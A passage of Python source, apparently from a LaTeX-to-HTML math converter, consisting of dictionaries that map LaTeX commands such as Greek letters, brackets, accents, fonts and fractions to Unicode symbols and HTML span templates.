u'\\kappa': u'κ', u'\\koppa': u'ϟ', u'\\l': u'ł', u'\\lambda': u'λ',
u'\\mu': u'μ', u'\\nu': u'ν', u'\\o': u'ø', u'\\oe': u'œ', u'\\omega': u'ω',
u'\\phi': u'φ', u'\\pi': u'π', u'\\psi': u'ψ', u'\\rho': u'ρ',
u'\\sampi': u'ϡ', u'\\sigma': u'σ', u'\\ss': u'ß', u'\\stigma': u'ϛ',
u'\\tau': u'τ', u'\\tcohm': u'Ω', u'\\textcrh': u'ħ', u'\\th': u'þ',
u'\\theta': u'θ', u'\\upsilon': u'υ', u'\\varDelta': u'∆',
u'\\varGamma': u'Γ', u'\\varLambda': u'Λ', u'\\varOmega': u'Ω',
u'\\varPhi': u'Φ', u'\\varPi': u'Π', u'\\varPsi': u'Ψ', u'\\varSigma': u'Σ',
u'\\varTheta': u'Θ', u'\\varUpsilon': u'Υ', u'\\varXi': u'Ξ',
u'\\varbeta': u'ϐ', u'\\varepsilon': u'ε', u'\\varkappa': u'ϰ',
u'\\varphi': u'φ', u'\\varpi': u'ϖ', u'\\varrho': u'ϱ', u'\\varsigma': u'ς',
u'\\vartheta': u'ϑ', u'\\xi': u'ξ', u'\\zeta': u'ζ',
}
array = {
u'begin': u'\\begin', u'cellseparator': u'&', u'end': u'\\end',
u'rowseparator': u'\\\\',
}
bigbrackets = {
u'(': [u'⎛', u'⎜', u'⎝',], u')': [u'⎞', u'⎟', u'⎠',], u'[': [u'⎡', u'⎢', u'⎣',],
u']': [u'⎤', u'⎥', u'⎦',], u'{': [u'⎧', u'⎪', u'⎨', u'⎩',], u'|': [u'|',],
u'}': [u'⎫', u'⎪', u'⎬', u'⎭',], u'∥': [u'∥',],
}
bigsymbols = {
u'∑': [u'⎲', u'⎳',], u'∫': [u'⌠', u'⌡',],
}
bracketcommands = {
u'\\left': u'span class="symbol"',
u'\\left.': u'<span class="leftdot"></span>',
u'\\middle': u'span class="symbol"', u'\\right': u'span class="symbol"',
u'\\right.': u'<span class="rightdot"></span>',
}
combiningfunctions = {
u'\\"': u'̈', u'\\\'': u'́', u'\\^': u'̂', u'\\`': u'̀', u'\\acute': u'́',
u'\\bar': u'̄', u'\\breve': u'̆', u'\\c': u'̧', u'\\check': u'̌',
u'\\dddot': u'⃛', u'\\ddot': u'̈', u'\\dot': u'̇', u'\\grave': u'̀',
u'\\hat': u'̂', u'\\mathring': u'̊', u'\\overleftarrow': u'⃖',
u'\\overrightarrow': u'⃗', u'\\r': u'̊', u'\\s': u'̩',
u'\\textcircled': u'⃝', u'\\textsubring': u'̥', u'\\tilde': u'̃',
u'\\v': u'̌', u'\\vec': u'⃗', u'\\~': u'̃',
}
commands = {
u'\\ ': u' ', u'\\!': u'', u'\\#': u'#', u'\\$': u'$', u'\\%': u'%',
u'\\&': u'&', u'\\,': u' ', u'\\:': u' ', u'\\;': u' ', u'\\AC': u'∿',
u'\\APLcomment': u'⍝', u'\\APLdownarrowbox': u'⍗', u'\\APLinput': u'⍞',
u'\\APLinv': u'⌹', u'\\APLleftarrowbox': u'⍇', u'\\APLlog': u'⍟',
u'\\APLrightarrowbox': u'⍈', u'\\APLuparrowbox': u'⍐', u'\\Box': u'□',
u'\\Bumpeq': u'≎', u'\\CIRCLE': u'●', u'\\Cap': u'⋒',
u'\\CapitalDifferentialD': u'ⅅ', u'\\CheckedBox': u'☑', u'\\Circle': u'○',
u'\\Coloneqq': u'⩴', u'\\ComplexI': u'ⅈ', u'\\ComplexJ': u'ⅉ',
u'\\Corresponds': u'≙', u'\\Cup': u'⋓', u'\\Delta': u'Δ', u'\\Diamond': u'◇',
u'\\Diamondblack': u'◆', u'\\Diamonddot': u'⟐', u'\\DifferentialD': u'ⅆ',
u'\\Downarrow': u'⇓', u'\\EUR': u'€', u'\\Euler': u'ℇ',
u'\\ExponetialE': u'ⅇ', u'\\Finv': u'Ⅎ', u'\\Game': u'⅁', u'\\Gamma': u'Γ',
u'\\Im': u'ℑ', u'\\Join': u'⨝', u'\\LEFTCIRCLE': u'◖', u'\\LEFTcircle': u'◐',
u'\\LHD': u'◀', u'\\Lambda': u'Λ', u'\\Lbag': u'⟅', u'\\Leftarrow': u'⇐',
u'\\Lleftarrow': u'⇚', u'\\Longleftarrow': u'⟸',
u'\\Longleftrightarrow': u'⟺', u'\\Longrightarrow': u'⟹', u'\\Lparen': u'⦅',
u'\\Lsh': u'↰', u'\\Mapsfrom': u'⇐|', u'\\Mapsto': u'|⇒', u'\\Omega': u'Ω',
u'\\P': u'¶', u'\\Phi': u'Φ', u'\\Pi': u'Π', u'\\Pr': u'Pr', u'\\Psi': u'Ψ',
u'\\Qoppa': u'Ϙ', u'\\RHD': u'▶', u'\\RIGHTCIRCLE': u'◗',
u'\\RIGHTcircle': u'◑', u'\\Rbag': u'⟆', u'\\Re': u'ℜ', u'\\Rparen': u'⦆',
u'\\Rrightarrow': u'⇛', u'\\Rsh': u'↱', u'\\S': u'§', u'\\Sigma': u'Σ',
u'\\Square': u'☐', u'\\Subset': u'⋐', u'\\Sun': u'☉', u'\\Supset': u'⋑',
u'\\Theta': u'Θ', u'\\Uparrow': u'⇑', u'\\Updownarrow': u'⇕',
u'\\Upsilon': u'Υ', u'\\Vdash': u'⊩', u'\\Vert': u'∥', u'\\Vvdash': u'⊪',
u'\\XBox': u'☒', u'\\Xi': u'Ξ', u'\\Yup': u'⅄', u'\\\\': u'<br/>',
u'\\_': u'_', u'\\aleph': u'ℵ', u'\\amalg': u'∐', u'\\anchor': u'⚓',
u'\\angle': u'∠', u'\\aquarius': u'♒', u'\\arccos': u'arccos',
u'\\arcsin': u'arcsin', u'\\arctan': u'arctan', u'\\arg': u'arg',
u'\\aries': u'♈', u'\\arrowbullet': u'➢', u'\\ast': u'∗', u'\\asymp': u'≍',
u'\\backepsilon': u'∍', u'\\backprime': u'‵', u'\\backsimeq': u'⋍',
u'\\backslash': u'\\', u'\\ballotx': u'✗', u'\\barwedge': u'⊼',
u'\\because': u'∵', u'\\beth': u'ℶ', u'\\between': u'≬', u'\\bigcap': u'∩',
u'\\bigcirc': u'○', u'\\bigcup': u'∪', u'\\bigodot': u'⊙',
u'\\bigoplus': u'⊕', u'\\bigotimes': u'⊗', u'\\bigsqcup': u'⊔',
u'\\bigstar': u'★', u'\\bigtriangledown': u'▽', u'\\bigtriangleup': u'△',
u'\\biguplus': u'⊎', u'\\bigvee': u'∨', u'\\bigwedge': u'∧',
u'\\biohazard': u'☣', u'\\blacklozenge': u'⧫', u'\\blacksmiley': u'☻',
u'\\blacksquare': u'■', u'\\blacktriangle': u'▲',
u'\\blacktriangledown': u'▼', u'\\blacktriangleleft': u'◂',
u'\\blacktriangleright': u'▶', u'\\blacktriangleup': u'▴', u'\\bot': u'⊥',
u'\\bowtie': u'⋈', u'\\box': u'▫', u'\\boxast': u'⧆', u'\\boxbar': u'◫',
u'\\boxbox': u'⧈', u'\\boxbslash': u'⧅', u'\\boxcircle': u'⧇',
u'\\boxdot': u'⊡', u'\\boxminus': u'⊟', u'\\boxplus': u'⊞',
u'\\boxslash': u'⧄', u'\\boxtimes': u'⊠', u'\\bullet': u'•',
u'\\bumpeq': u'≏', u'\\cancer': u'♋', u'\\cap': u'∩', u'\\capricornus': u'♑',
u'\\cat': u'⁀', u'\\cdot': u'⋅', u'\\cdots': u'⋯', u'\\cent': u'¢',
u'\\centerdot': u'∙', u'\\checkmark': u'✓', u'\\chi': u'χ', u'\\circ': u'∘',
u'\\circeq': u'≗', u'\\circlearrowleft': u'↺', u'\\circlearrowright': u'↻',
u'\\circledR': u'®', u'\\circledast': u'⊛', u'\\circledbslash': u'⦸',
u'\\circledcirc': u'⊚', u'\\circleddash': u'⊝', u'\\circledgtr': u'⧁',
u'\\circledless': u'⧀', u'\\clubsuit': u'♣', u'\\colon': u': ', u'\\coloneqq': u'≔',
u'\\complement': u'∁', u'\\cong': u'≅', u'\\coprod': u'∐',
u'\\copyright': u'©', u'\\cos': u'cos', u'\\cosh': u'cosh', u'\\cot': u'cot',
u'\\coth': u'coth', u'\\csc': u'csc', u'\\cup': u'∪', u'\\curlyvee': u'⋎',
u'\\curlywedge': u'⋏', u'\\curvearrowleft': u'↶',
u'\\curvearrowright': u'↷', u'\\dag': u'†', u'\\dagger': u'†',
u'\\daleth': u'ℸ', u'\\dashleftarrow': u'⇠', u'\\dashv': u'⊣',
u'\\ddag': u'‡', u'\\ddagger': u'‡', u'\\ddots': u'⋱', u'\\deg': u'deg',
u'\\det': u'det', u'\\diagdown': u'╲', u'\\diagup': u'╱',
u'\\diameter': u'⌀', u'\\diamond': u'◇', u'\\diamondsuit': u'♦',
u'\\dim': u'dim', u'\\div': u'÷', u'\\divideontimes': u'⋇',
u'\\dotdiv': u'∸', u'\\doteq': u'≐', u'\\doteqdot': u'≑', u'\\dotplus': u'∔',
u'\\dots': u'…', u'\\doublebarwedge': u'⌆', u'\\downarrow': u'↓',
u'\\downdownarrows': u'⇊', u'\\downharpoonleft': u'⇃',
u'\\downharpoonright': u'⇂', u'\\dsub': u'⩤', u'\\earth': u'♁',
u'\\eighthnote': u'♪', u'\\ell': u'ℓ', u'\\emptyset': u'∅',
u'\\eqcirc': u'≖', u'\\eqcolon': u'≕', u'\\eqsim': u'≂', u'\\euro': u'€',
u'\\exists': u'∃', u'\\exp': u'exp', u'\\fallingdotseq': u'≒',
u'\\fcmp': u'⨾', u'\\female': u'♀', u'\\flat': u'♭', u'\\forall': u'∀',
u'\\fourth': u'⁗', u'\\frown': u'⌢', u'\\frownie': u'☹', u'\\gcd': u'gcd',
u'\\gemini': u'♊', u'\\geq)': u'≥', u'\\geqq': u'≧', u'\\geqslant': u'≥',
u'\\gets': u'←', u'\\gg': u'≫', u'\\ggg': u'⋙', u'\\gimel': u'ℷ',
u'\\gneqq': u'≩', u'\\gnsim': u'⋧', u'\\gtrdot': u'⋗', u'\\gtreqless': u'⋚',
u'\\gtreqqless': u'⪌', u'\\gtrless': u'≷', u'\\gtrsim': u'≳',
u'\\guillemotleft': u'«', u'\\guillemotright': u'»', u'\\hbar': u'ℏ',
u'\\heartsuit': u'♥', u'\\hfill': u'<span class="hfill"> </span>',
u'\\hom': u'hom', u'\\hookleftarrow': u'↩', u'\\hookrightarrow': u'↪',
u'\\hslash': u'ℏ', u'\\idotsint': u'<span class="bigsymbol">∫⋯∫</span>',
u'\\iiint': u'<span class="bigsymbol">∭</span>',
u'\\iint': u'<span class="bigsymbol">∬</span>', u'\\imath': u'ı',
u'\\inf': u'inf', u'\\infty': u'∞', u'\\intercal': u'⊺',
u'\\interleave': u'⫴', u'\\invamp': u'⅋', u'\\invneg': u'⌐',
u'\\jmath': u'ȷ', u'\\jupiter': u'♃', u'\\ker': u'ker', u'\\land': u'∧',
u'\\landupint': u'<span class="bigsymbol">∱</span>', u'\\lang': u'⟪',
u'\\langle': u'⟨', u'\\lblot': u'⦉', u'\\lbrace': u'{', u'\\lbrace)': u'{',
u'\\lbrack': u'[', u'\\lceil': u'⌈', u'\\ldots': u'…', u'\\leadsto': u'⇝',
u'\\leftarrow)': u'←', u'\\leftarrowtail': u'↢', u'\\leftarrowtobar': u'⇤',
u'\\leftharpoondown': u'↽', u'\\leftharpoonup': u'↼',
u'\\leftleftarrows': u'⇇', u'\\leftleftharpoons': u'⥢', u'\\leftmoon': u'☾',
u'\\leftrightarrow': u'↔', u'\\leftrightarrows': u'⇆',
u'\\leftrightharpoons': u'⇋', u'\\leftthreetimes': u'⋋', u'\\leo': u'♌',
u'\\leq)': u'≤', u'\\leqq': u'≦', u'\\leqslant': u'≤', u'\\lessdot': u'⋖',
u'\\lesseqgtr': u'⋛', u'\\lesseqqgtr': u'⪋', u'\\lessgtr': u'≶',
u'\\lesssim': u'≲', u'\\lfloor': u'⌊', u'\\lg': u'lg', u'\\lgroup': u'⟮',
u'\\lhd': u'⊲', u'\\libra': u'♎', u'\\lightning': u'↯', u'\\limg': u'⦇',
u'\\liminf': u'liminf', u'\\limsup': u'limsup', u'\\ll': u'≪',
u'\\llbracket': u'⟦', u'\\llcorner': u'⌞', u'\\lll': u'⋘', u'\\ln': u'ln',
u'\\lneqq': u'≨', u'\\lnot': u'¬', u'\\lnsim': u'⋦', u'\\log': u'log',
u'\\longleftarrow': u'⟵', u'\\longleftrightarrow': u'⟷',
u'\\longmapsto': u'⟼', u'\\longrightarrow': u'⟶', u'\\looparrowleft': u'↫',
u'\\looparrowright': u'↬', u'\\lor': u'∨', u'\\lozenge': u'◊',
u'\\lrcorner': u'⌟', u'\\ltimes': u'⋉', u'\\lyxlock': u'', u'\\male': u'♂',
u'\\maltese': u'✠', u'\\mapsfrom': u'↤', u'\\mapsto': u'↦',
u'\\mathcircumflex': u'^', u'\\max': u'max', u'\\measuredangle': u'∡',
u'\\medbullet': u'⚫', u'\\medcirc': u'⚪', u'\\mercury': u'☿', u'\\mho': u'℧',
u'\\mid': u'∣', u'\\min': u'min', u'\\models': u'⊨', u'\\mp': u'∓',
u'\\multimap': u'⊸', u'\\nLeftarrow': u'⇍', u'\\nLeftrightarrow': u'⇎',
u'\\nRightarrow': u'⇏', u'\\nVDash': u'⊯', u'\\nabla': u'∇',
u'\\napprox': u'≉', u'\\natural': u'♮', u'\\ncong': u'≇', u'\\nearrow': u'↗',
u'\\neg': u'¬', u'\\neg)': u'¬', u'\\neptune': u'♆', u'\\nequiv': u'≢',
u'\\newline': u'<br/>', u'\\nexists': u'∄', u'\\ngeqslant': u'≱',
u'\\ngtr': u'≯', u'\\ngtrless': u'≹', u'\\ni': u'∋', u'\\ni)': u'∋',
u'\\nleftarrow': u'↚', u'\\nleftrightarrow': u'↮', u'\\nleqslant': u'≰',
u'\\nless': u'≮', u'\\nlessgtr': u'≸', u'\\nmid': u'∤', u'\\nolimits': u'',
u'\\nonumber': u'', u'\\not': u'¬', u'\\not<': u'≮', u'\\not=': u'≠',
u'\\not>': u'≯', u'\\notbackslash': u'⍀', u'\\notin': u'∉', u'\\notni': u'∌',
u'\\notslash': u'⌿', u'\\nparallel': u'∦', u'\\nprec': u'⊀',
u'\\nrightarrow': u'↛', u'\\nsim': u'≁', u'\\nsimeq': u'≄',
u'\\nsqsubset': u'⊏̸', u'\\nsubseteq': u'⊈', u'\\nsucc': u'⊁',
u'\\nsucccurlyeq': u'⋡', u'\\nsupset': u'⊅', u'\\nsupseteq': u'⊉',
u'\\ntriangleleft': u'⋪', u'\\ntrianglelefteq': u'⋬',
u'\\ntriangleright': u'⋫', u'\\ntrianglerighteq': u'⋭', u'\\nvDash': u'⊭',
u'\\nvdash': u'⊬', u'\\nwarrow': u'↖', u'\\odot': u'⊙',
u'\\officialeuro': u'€', u'\\oiiint': u'<span class="bigsymbol">∰</span>',
u'\\oiint': u'<span class="bigsymbol">∯</span>',
u'\\oint': u'<span class="bigsymbol">∮</span>',
u'\\ointclockwise': u'<span class="bigsymbol">∲</span>',
u'\\ointctrclockwise': u'<span class="bigsymbol">∳</span>',
u'\\ominus': u'⊖', u'\\oplus': u'⊕', u'\\oslash': u'⊘', u'\\otimes': u'⊗',
u'\\owns': u'∋', u'\\parallel': u'∥', u'\\partial': u'∂', u'\\pencil': u'✎',
u'\\perp': u'⊥', u'\\pisces': u'♓', u'\\pitchfork': u'⋔', u'\\pluto': u'♇',
u'\\pm': u'±', u'\\pointer': u'➪', u'\\pointright': u'☞', u'\\pounds': u'£',
u'\\prec': u'≺', u'\\preccurlyeq': u'≼', u'\\preceq': u'≼',
u'\\precsim': u'≾', u'\\prime': u'′', u'\\prompto': u'∝', u'\\qoppa': u'ϙ',
u'\\qquad': u' ', u'\\quad': u' ', u'\\quarternote': u'♩',
u'\\radiation': u'☢', u'\\rang': u'⟫', u'\\rangle': u'⟩', u'\\rblot': u'⦊',
u'\\rbrace': u'}', u'\\rbrace)': u'}', u'\\rbrack': u']', u'\\rceil': u'⌉',
u'\\recycle': u'♻', u'\\rfloor': u'⌋', u'\\rgroup': u'⟯', u'\\rhd': u'⊳',
u'\\rightangle': u'∟', u'\\rightarrow)': u'→', u'\\rightarrowtail': u'↣',
u'\\rightarrowtobar': u'⇥', u'\\rightharpoondown': u'⇁',
u'\\rightharpoonup': u'⇀', u'\\rightharpooondown': u'⇁',
u'\\rightharpooonup': u'⇀', u'\\rightleftarrows': u'⇄',
u'\\rightleftharpoons': u'⇌', u'\\rightmoon': u'☽',
u'\\rightrightarrows': u'⇉', u'\\rightrightharpoons': u'⥤',
u'\\rightthreetimes': u'⋌', u'\\rimg': u'⦈', u'\\risingdotseq': u'≓',
u'\\rrbracket': u'⟧', u'\\rsub': u'⩥', u'\\rtimes': u'⋊',
u'\\sagittarius': u'♐', u'\\saturn': u'♄', u'\\scorpio': u'♏',
u'\\searrow': u'↘', u'\\sec': u'sec', u'\\second': u'″', u'\\setminus': u'∖',
u'\\sharp': u'♯', u'\\simeq': u'≃', u'\\sin': u'sin', u'\\sinh': u'sinh',
u'\\sixteenthnote': u'♬', u'\\skull': u'☠', u'\\slash': u'∕',
u'\\smallsetminus': u'∖', u'\\smalltriangledown': u'▿',
u'\\smalltriangleleft': u'◃', u'\\smalltriangleright': u'▹',
u'\\smalltriangleup': u'▵', u'\\smile': u'⌣', u'\\smiley': u'☺',
u'\\spadesuit': u'♠', u'\\spddot': u'¨', u'\\sphat': u'',
u'\\sphericalangle': u'∢', u'\\spot': u'⦁', u'\\sptilde': u'~',
u'\\sqcap': u'⊓', u'\\sqcup': u'⊔', u'\\sqsubset': u'⊏',
u'\\sqsubseteq': u'⊑', u'\\sqsupset': u'⊐', u'\\sqsupseteq': u'⊒',
u'\\square': u'□', u'\\sslash': u'⫽', u'\\star': u'⋆', u'\\steaming': u'☕',
u'\\subseteqq': u'⫅', u'\\subsetneqq': u'⫋', u'\\succ': u'≻',
u'\\succcurlyeq': u'≽', u'\\succeq': u'≽', u'\\succnsim': u'⋩',
u'\\succsim': u'≿', u'\\sun': u'☼', u'\\sup': u'sup', u'\\supseteqq': u'⫆',
u'\\supsetneqq': u'⫌', u'\\surd': u'√', u'\\swarrow': u'↙',
u'\\swords': u'⚔', u'\\talloblong': u'⫾', u'\\tan': u'tan',
u'\\tanh': u'tanh', u'\\taurus': u'♉', u'\\textasciicircum': u'^',
u'\\textasciitilde': u'~', u'\\textbackslash': u'\\',
u'\\textcopyright': u'©\'', u'\\textdegree': u'°', u'\\textellipsis': u'…',
u'\\textemdash': u'—', u'\\textendash': u'—', u'\\texteuro': u'€',
u'\\textgreater': u'>', u'\\textless': u'<', u'\\textordfeminine': u'ª',
u'\\textordmasculine': u'º', u'\\textquotedblleft': u'“',
u'\\textquotedblright': u'”', u'\\textquoteright': u'’',
u'\\textregistered': u'®', u'\\textrightarrow': u'→',
u'\\textsection': u'§', u'\\texttrademark': u'™',
u'\\texttwosuperior': u'²', u'\\textvisiblespace': u' ',
u'\\therefore': u'∴', u'\\third': u'‴', u'\\top': u'⊤', u'\\triangle': u'△',
u'\\triangleleft': u'⊲', u'\\trianglelefteq': u'⊴', u'\\triangleq': u'≜',
u'\\triangleright': u'▷', u'\\trianglerighteq': u'⊵',
u'\\twoheadleftarrow': u'↞', u'\\twoheadrightarrow': u'↠',
u'\\twonotes': u'♫', u'\\udot': u'⊍', u'\\ulcorner': u'⌜', u'\\unlhd': u'⊴',
u'\\unrhd': u'⊵', u'\\unrhl': u'⊵', u'\\uparrow': u'↑',
u'\\updownarrow': u'↕', u'\\upharpoonleft': u'↿', u'\\upharpoonright': u'↾',
u'\\uplus': u'⊎', u'\\upuparrows': u'⇈', u'\\uranus': u'♅',
u'\\urcorner': u'⌝', u'\\vDash': u'⊨', u'\\varclubsuit': u'♧',
u'\\vardiamondsuit': u'♦', u'\\varheartsuit': u'♥', u'\\varnothing': u'∅',
u'\\varspadesuit': u'♤', u'\\vdash': u'⊢', u'\\vdots': u'⋮', u'\\vee': u'∨',
u'\\vee)': u'∨', u'\\veebar': u'⊻', u'\\vert': u'∣', u'\\virgo': u'♍',
u'\\warning': u'⚠', u'\\wasylozenge': u'⌑', u'\\wedge': u'∧',
u'\\wedge)': u'∧', u'\\wp': u'℘', u'\\wr': u'≀', u'\\yen': u'¥',
u'\\yinyang': u'☯', u'\\{': u'{', u'\\|': u'∥', u'\\}': u'}',
}
decoratedcommand = {
}
decoratingfunctions = {
u'\\overleftarrow': u'⟵', u'\\overrightarrow': u'⟶', u'\\widehat': u'^',
}
endings = {
u'bracket': u'}', u'complex': u'\\]', u'endafter': u'}',
u'endbefore': u'\\end{', u'squarebracket': u']',
}
environments = {
u'align': [u'r', u'l',], u'eqnarray': [u'r', u'c', u'l',],
u'gathered': [u'l', u'l',],
}
fontfunctions = {
u'\\boldsymbol': u'b', u'\\mathbb': u'span class="blackboard"',
u'\\mathbb{A}': u'𝔸', u'\\mathbb{B}': u'𝔹', u'\\mathbb{C}': u'ℂ',
u'\\mathbb{D}': u'𝔻', u'\\mathbb{E}': u'𝔼', u'\\mathbb{F}': u'𝔽',
u'\\mathbb{G}': u'𝔾', u'\\mathbb{H}': u'ℍ', u'\\mathbb{J}': u'𝕁',
u'\\mathbb{K}': u'𝕂', u'\\mathbb{L}': u'𝕃', u'\\mathbb{N}': u'ℕ',
u'\\mathbb{O}': u'𝕆', u'\\mathbb{P}': u'ℙ', u'\\mathbb{Q}': u'ℚ',
u'\\mathbb{R}': u'ℝ', u'\\mathbb{S}': u'𝕊', u'\\mathbb{T}': u'𝕋',
u'\\mathbb{W}': u'𝕎', u'\\mathbb{Z}': u'ℤ', u'\\mathbf': u'b',
u'\\mathcal': u'span class="scriptfont"', u'\\mathcal{B}': u'ℬ',
u'\\mathcal{E}': u'ℰ', u'\\mathcal{F}': u'ℱ', u'\\mathcal{H}': u'ℋ',
u'\\mathcal{I}': u'ℐ', u'\\mathcal{L}': u'ℒ', u'\\mathcal{M}': u'ℳ',
u'\\mathcal{R}': u'ℛ', u'\\mathfrak': u'span class="fraktur"',
u'\\mathfrak{C}': u'ℭ', u'\\mathfrak{F}': u'𝔉', u'\\mathfrak{H}': u'ℌ',
u'\\mathfrak{I}': u'ℑ', u'\\mathfrak{R}': u'ℜ', u'\\mathfrak{Z}': u'ℨ',
u'\\mathit': u'i', u'\\mathring{A}': u'Å', u'\\mathring{U}': u'Ů',
u'\\mathring{a}': u'å', u'\\mathring{u}': u'ů', u'\\mathring{w}': u'ẘ',
u'\\mathring{y}': u'ẙ', u'\\mathrm': u'span class="mathrm"',
u'\\mathscr': u'span class="scriptfont"', u'\\mathscr{B}': u'ℬ',
u'\\mathscr{E}': u'ℰ', u'\\mathscr{F}': u'ℱ', u'\\mathscr{H}': u'ℋ',
u'\\mathscr{I}': u'ℐ', u'\\mathscr{L}': u'ℒ', u'\\mathscr{M}': u'ℳ',
u'\\mathscr{R}': u'ℛ', u'\\mathsf': u'span class="mathsf"',
u'\\mathtt': u'tt',
}
hybridfunctions = {
u'\\addcontentsline': [u'{$p!}{$q!}{$r!}', u'f0{}', u'ignored',],
u'\\addtocontents': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\backmatter': [u'', u'f0{}', u'ignored',],
u'\\binom': [u'{$1}{$2}', u'f2{(}f0{f1{$1}f1{$2}}f2{)}', u'span class="binom"', u'span class="binomstack"', u'span class="bigsymbol"',],
u'\\boxed': [u'{$1}', u'f0{$1}', u'span class="boxed"',],
u'\\cfrac': [u'[$p!]{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator align-$p"', u'span class="denominator"', u'span class="ignored"',],
u'\\color': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\colorbox': [u'{$p!}{$1}', u'f0{$1}', u'span class="colorbox" style="background: $p;"',],
u'\\dbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\dfrac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\displaystyle': [u'{$1}', u'f0{$1}', u'span class="displaystyle"',],
u'\\fancyfoot': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fancyhead': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fbox': [u'{$1}', u'f0{$1}', u'span class="fbox"',],
u'\\fboxrule': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fboxsep': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fcolorbox': [u'{$p!}{$q!}{$1}', u'f0{$1}', u'span class="boxed" style="border-color: $p; background: $q;"',],
u'\\frac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\framebox': [u'[$p!][$q!]{$1}', u'f0{$1}', u'span class="framebox align-$q" style="width: $p;"',],
u'\\frontmatter': [u'', u'f0{}', u'ignored',],
u'\\href': [u'[$o]{$u!}{$t!}', u'f0{$t}', u'a href="$u"',],
u'\\hspace': [u'{$p!}', u'f0{ }', u'span class="hspace" style="width: $p;"',],
u'\\leftroot': [u'{$p!}', u'f0{ }', u'span class="leftroot" style="width: $p;px"',],
u'\\mainmatter': [u'', u'f0{}', u'ignored',],
u'\\markboth': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\markright': [u'{$p!}', u'f0{}', u'ignored',],
u'\\nicefrac': [u'{$1}{$2}', u'f0{f1{$1}⁄f2{$2}}', u'span class="fraction"', u'sup class="numerator"', u'sub class="denominator"', u'span class="ignored"',],
u'\\parbox': [u'[$p!]{$w!}{$1}', u'f0{1}', u'div class="Boxed" style="width: $w;"',],
u'\\raisebox': [u'{$p!}{$1}', u'f0{$1.font}', u'span class="raisebox" style="vertical-align: $p;"',],
u'\\renewenvironment': [u'{$1!}{$2!}{$3!}', u'',],
u'\\rule': [u'[$v!]{$w!}{$h!}', u'f0/', u'hr class="line" style="width: $w; height: $h;"',],
u'\\scriptscriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptscriptstyle"',],
u'\\scriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptstyle"',],
u'\\sqrt': [u'[$0]{$1}', u'f0{f1{$0}f2{√}f4{(}f3{$1}f4{)}}', u'span class="sqrt"', u'sup class="root"', u'span class="radical"', u'span class="root"', u'span class="ignored"',],
u'\\stackrel': [u'{$1}{$2}', u'f0{f1{$1}f2{$2}}', u'span class="stackrel"', u'span class="upstackrel"', u'span class="downstackrel"',],
u'\\tbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\textcolor': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\textstyle': [u'{$1}', u'f0{$1}', u'span class="textstyle"',],
u'\\thispagestyle': [u'{$p!}', u'f0{}', u'ignored',],
u'\\unit': [u'[$0]{$1}', u'$0f0{$1.font}', u'span class="unit"',],
u'\\unitfrac': [u'[$0]{$1}{$2}', u'$0f0{f1{$1.font}⁄f2{$2.font}}', u'span class="fraction"', u'sup class="unit"', u'sub class="unit"',],
u'\\uproot': [u'{$p!}', u'f0{ }', u'span class="uproot" style="width: $p;px"',],
u'\\url': [u'{$u!}', u'f0{$u}', u'a href="$u"',],
u'\\vspace': [u'{$p!}', u'f0{ }', u'span class="vspace" style="height: $p;"',],
}
hybridsizes = {
u'\\binom': u'$1+$2', u'\\cfrac': u'$1+$2', u'\\dbinom': u'$1+$2+1',
u'\\dfrac': u'$1+$2', u'\\frac': u'$1+$2', u'\\tbinom': u'$1+$2+1',
}
labelfunctions = {
u'\\label': u'a name="#"',
}
limitcommands = {
u'\\biginterleave': u'⫼', u'\\bigsqcap': u'⨅', u'\\fint': u'⨏',
u'\\iiiint': u'⨌', u'\\int': u'∫', u'\\intop': u'∫', u'\\lim': u'lim',
u'\\prod': u'∏', u'\\smallint': u'∫', u'\\sqint': u'⨖', u'\\sum': u'∑',
u'\\varointclockwise': u'∲', u'\\varprod': u'⨉', u'\\zcmp': u'⨟',
u'\\zhide': u'⧹', u'\\zpipe': u'⨠', u'\\zproject': u'⨡',
}
misccommands = {
u'\\limits': u'LimitPreviousCommand', u'\\newcommand': u'MacroDefinition',
u'\\renewcommand': u'MacroDefinition',
u'\\setcounter': u'SetCounterFunction', u'\\tag': u'FormulaTag',
u'\\tag*': u'FormulaTag', u'\\today': u'TodayCommand',
}
modified = {
u'\n': u'', u' ': u'', u'$': u'', u'&': u' ', u'\'': u'’', u'+': u' + ',
u',': u', ', u'-': u' − ', u'/': u' ⁄ ', u':': u' : ', u'<': u' < ',
u'=': u' = ', u'>': u' > ', u'@': u'', u'~': u'',
}
onefunctions = {
u'\\Big': u'span class="bigsymbol"', u'\\Bigg': u'span class="hugesymbol"',
u'\\bar': u'span class="bar"', u'\\begin{array}': u'span class="arraydef"',
u'\\big': u'span class="symbol"', u'\\bigg': u'span class="largesymbol"',
u'\\bigl': u'span class="bigsymbol"', u'\\bigr': u'span class="bigsymbol"',
u'\\centering': u'span class="align-center"',
u'\\ensuremath': u'span class="ensuremath"',
u'\\hphantom': u'span class="phantom"',
u'\\noindent': u'span class="noindent"',
u'\\overbrace': u'span class="overbrace"',
u'\\overline': u'span class="overline"',
u'\\phantom': u'span class="phantom"',
u'\\underbrace': u'span class="underbrace"', u'\\underline': u'u',
u'\\vphantom': u'span class="phantom"',
}
spacedcommands = {
u'\\Bot': u'⫫', u'\\Doteq': u'≑', u'\\DownArrowBar': u'⤓',
